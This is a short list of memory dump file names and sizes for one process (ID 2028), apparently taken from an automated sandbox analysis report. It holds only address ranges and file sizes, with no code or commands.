memory/2028-72-0x0000000002610000-0x0000000002611000-memory.dmpFilesize
4KB
-
memory/2028-74-0x000000001C430000-0x000000001C431000-memory.dmpFilesize
4KB
-
memory/2028-70-0x000000001AA80000-0x000000001AA82000-memory.dmpFilesize
8KB
-
memory/2028-71-0x000000001AA84000-0x000000001AA86000-memory.dmpFilesize
8KB
-
memory/2028-82-0x0000000002450000-0x0000000002451000-memory.dmpFilesize
4KB
-
memory/2028-84-0x000000001A9E0000-0x000000001A9E1000-memory.dmpFilesize
4KB
-
memory/2028-69-0x0000000002550000-0x0000000002551000-memory.dmpFilesize
4KB
-
memory/2028-85-0x000000001C500000-0x000000001C501000-memory.dmpFilesize
4KB
-
memory/2028-101-0x000000001AA8A000-0x000000001AAA9000-memory.dmpFilesize
124KB
-
memory/2028-86-0x000000001B670000-0x000000001B671000-memory.dmpFilesize
4KB
-
memory/2028-65-0x0000000000000000-mapping.dmp
-
memory/2028-68-0x000000001AB00000-0x000000001AB01000-memory.dmpFilesize
4KB
-
memory/2028-66-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmpFilesize
8KB
-
memory/2028-158-0x000000001C7A0000-0x000000001C7A1000-memory.dmpFilesize
4KB
